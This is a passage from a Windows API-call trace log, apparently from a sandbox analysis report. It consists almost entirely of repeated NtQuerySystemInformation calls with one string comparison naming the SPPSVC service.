(SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x50, ResultLength=0x0) [0288.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x38, ResultLength=0x0) [0288.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0288.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0288.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0288.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0288.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x28, ResultLength=0x0) [0288.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x38, ResultLength=0x0) [0288.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x28, ResultLength=0x0) [0288.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x28, ResultLength=0x0) [0288.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x38, ResultLength=0x0) [0288.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0288.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0288.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0288.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0288.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x38, ResultLength=0x0) [0288.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0288.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0288.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0288.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.898] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0288.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce88, Length=0x50, ResultLength=0x0) [0288.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x28, ResultLength=0x0) [0288.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x28, ResultLength=0x0) [0288.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x28, ResultLength=0x0) [0288.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x20, ResultLength=0x0) [0288.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0288.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0288.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0288.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x20, ResultLength=0x0) [0288.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0288.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0288.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0288.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0288.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0288.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0288.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0288.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0288.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0288.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0288.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0288.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0288.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caa0, Length=0x28, ResultLength=0x0) [0288.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0288.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0288.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0288.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0288.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0288.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0288.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0288.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0288.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0288.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0288.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0288.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0288.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0288.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0288.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0288.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0288.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0288.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0288.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0288.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0288.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0288.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0288.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0288.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0288.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caa0, Length=0x28, ResultLength=0x0) [0288.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0288.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0289.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0289.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0289.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0289.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0289.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0289.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0289.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0289.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0289.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0289.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0289.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1c0, Length=0x20, ResultLength=0x0) [0289.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, 